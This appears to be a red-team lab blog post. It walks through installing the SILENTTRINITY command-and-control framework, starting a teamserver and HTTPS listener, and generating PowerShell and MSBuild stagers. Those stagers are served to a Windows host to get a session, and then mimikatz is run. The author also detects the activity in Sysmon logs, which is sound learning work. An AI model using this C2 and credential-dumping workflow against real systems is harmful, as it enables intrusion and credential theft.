SILENTTRINITY (ST) made the news a few times in July 2019, and I wanted to see what all the fuss was about. This article has enough information to get ST installed, the teamserver operational, and a client connected to the teamserver. Once all that is out of the way, we’ll go for the goods.
Pre-Req’s for Following Along
- Digital Ocean $10/mo Ubuntu 19.10 Node
- Windows box[es] for pillaging
- Permissions to perform said pillaging
Each time there seem to be some issues with at least one install directive. But, at this point, my stable install looks something like the following.
git clone https://github.com/byt3bl33d3r/SILENTTRINITY apt update && apt upgrade apt install python3.7 python3.7-dev python3-pip sudo -H pip3 install -U pipenv cd SILENTTRINITY pip3 install -r requirements.txt pipenv install && pipenv shell
The Article I Wrote About SILENTTRINITY
Our story begins with a standard user on a Windows domain who we are going to assume clicked a link or executed an HTA. This user has appropriate (non-admin) privileges and as such limits our ability to easily escalate privileges. From there, the story provides some basic usage and hopefully expands the reader’s and my own knowledge.
Assuming the install went well, let’s get the server up and running. For opsec, we’d do things like ensure the server was running on a categorized domain name, we’d also limit access to the listening services via firewall restrictions, and we also need to be aware that Listeners can be dangerous and may contain vulnerabilities.
python st.py teamserver --port 81 10.10.98.228 BadPassword123
Once executed, we should get back the certificate fingerprint and a confirmation that the server is running.
Next, we need to get the client side connected. A couple of ways we can go about this. In red team ops, the server would be running on some cloud service or VPS and we’d connect to it from behind our own proxies, VPNs, firewalls, whathaveyou. In this case, I’m just going to open another tmux pane and connect to the server locally.
There’s a lot going on in the next screenshot. It includes the pwd (opt/SILENTTRINITY) and the preparation of a virtual environment so as not to tamper with all the other python related dependencies on the local system.
The commands used above, and the additional client connection to the Teamserver are below.
pwd pipenv install && pipenv shell python st.py client wss://aptclass:[email protected]:81
Once connected, the splash screen:
From here, we need to fire up a Listener.
listeners use https
The listener’s options menu for HTTPS:
The stagers / powershell options configuration and my favorite context-based tab completion implementation ever can be seen below.
But really — I just want the fastest way to malware which was:
stagers powershell generate https
stagers msbuild generate https
The stager.ps1 file was dropped into my /opt/SILENTTRINITY/ directory and was basically ready for execution. The python -m http.server works great to stand up a quick and browsable web server. I also generated a stager.xml for MSBuild, which is quieter and has fewer optics focused in its general direction, though that is changing too.
python -m http.server
Then, from the client, we snag the stager files.
…and…execute them. Full disclosure: PowerShell got flagged. The stager.xml file also got flagged. But, the msbuild.xml was “built” with the following command:
And, we get our session.
Here, like the Twilight Zone, I control the SIEM, sysmon deployment, the horizontal, and the vertical, and thus, I don’t care if I catch myself. In fact, I hope to. Which, with Sysmon is exceptionally easy.
We next find the sysmon event IDs by filtering our endpoint sysmon logs in Kibana for event_id:3. As seen below, we have the likely popped host, the process, and the destination IP address.
But, we might as well keep exploring, right? Egypt always told me he’d start any meterpreter session by validating running processes and process integrity because these things matter. If we can’t read all the process details, we aren’t admin and asking can be an IoC.
Let’s jump into the modules section and run ps.
modules use boo/ps run <session ID>
It’s already game over for this system. We have a privileged shell.
Let’s do it.
use boo/mimikatz run <session ID>
Cheers all and thanks for reading!
- ST: https://github.com/byt3bl33d3r/SILENTTRINITY
- ZDNet: https://www.zdnet.com/article/croatian-government-targeted-by-mysterious-hackers/
- SCMag: https://www.scmagazineuk.com/entirely-new-malware-silenttrinity-attacks-croatian-government/article/1590225
- Teamserver security: https://github.com/byt3bl33d3r/SILENTTRINITY/wiki/Teamserver-Security-Considerations-Guidelines